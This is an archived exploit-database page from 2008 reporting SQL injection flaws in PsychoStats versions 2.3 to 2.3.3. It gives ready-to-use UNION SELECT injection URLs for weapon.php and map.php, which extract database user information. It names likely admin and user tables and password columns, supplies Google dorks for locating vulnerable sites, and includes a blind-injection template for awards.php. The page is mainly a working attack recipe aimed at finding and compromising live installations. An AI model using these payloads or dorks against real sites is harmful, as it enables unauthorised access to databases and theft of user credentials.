PsychoStats <= 2.3.3 Multiple Remote SQL Injection Vulnerabilities

🗓️ 31 May 2008 00:00:00Reported by Mr.SQLType

zdt🔗 0day.today👁 33 Views

PsychoStats v2.3.3 Remote SQL Injection Vulnerabilitie

==================================================================
PsychoStats <= 2.3.3 Multiple Remote SQL Injection Vulnerabilities
==================================================================




###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## rEm0te SQL InjEction VulnErability 
##
## PsychoStats Versions (( - v2.3 - v2.3.1 - v2.3.3 - )) ( map.php id ) & ( weapon.php id )
##                              
###############################################################
#########################
##
## Script Name  : PsychoStats Versions (( - v2.3 - v2.3.1 - v2.3.3 - ))
##
## Download ScriptS : www.psychostats.com/downloads/
##
## D0rk F0r all Versions ::   "Powered by PsychoStats"
##
#########################
#########################

n0te :: Tables  (( psuser  0r  ps_user 0r psadmin 0r pas_admin )) get the table_name maybe Sites changed tables :))
     :: columns (( username 0r password 0r plr 0r name ))
       & in the exploit dont use -

n0te :: The Script have diffrent Versions you can get the source and search for other bugs


#########################
#########################
##
## PsychoStats v2.3 
##
## D0rK ::  "Powered by PsychoStats v2.3"
##
#########################
##
##   -(:: SQL ::)-
##
##    www.site.com/
##          weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
##
#########################
#########################



#########################
#########################
##
## PsychoStats v2.3.1 
##
## D0rK ::  "Powered by PsychoStats v2.3.1"
##
#########################
##
##   -(:: SQL ::)-
##
##   www.site.com/
##          map.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13,14,15,16,17--
##
#########################
#########################



#########################
#########################
##
## PsychoStats v2.3.3
##
## D0rK ::  "Powered by PsychoStats v2.3.3"
##
#########################
##
##   -(:: SQL ::)-
##
##     www.site.com/
##          weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*       
##
#############################################################################

=========
Google Keywords: "Powered by PsychoStats 3.2.2b"
=============== 
exploit:
========
 
http://server/awards.php?d=YYYY-MM-DD{Inject hier your blind SQL injection}




#  0day.today [2018-04-12]  #

31 May 2008 00:00Current

7.1High risk

Vulners AI Score7.1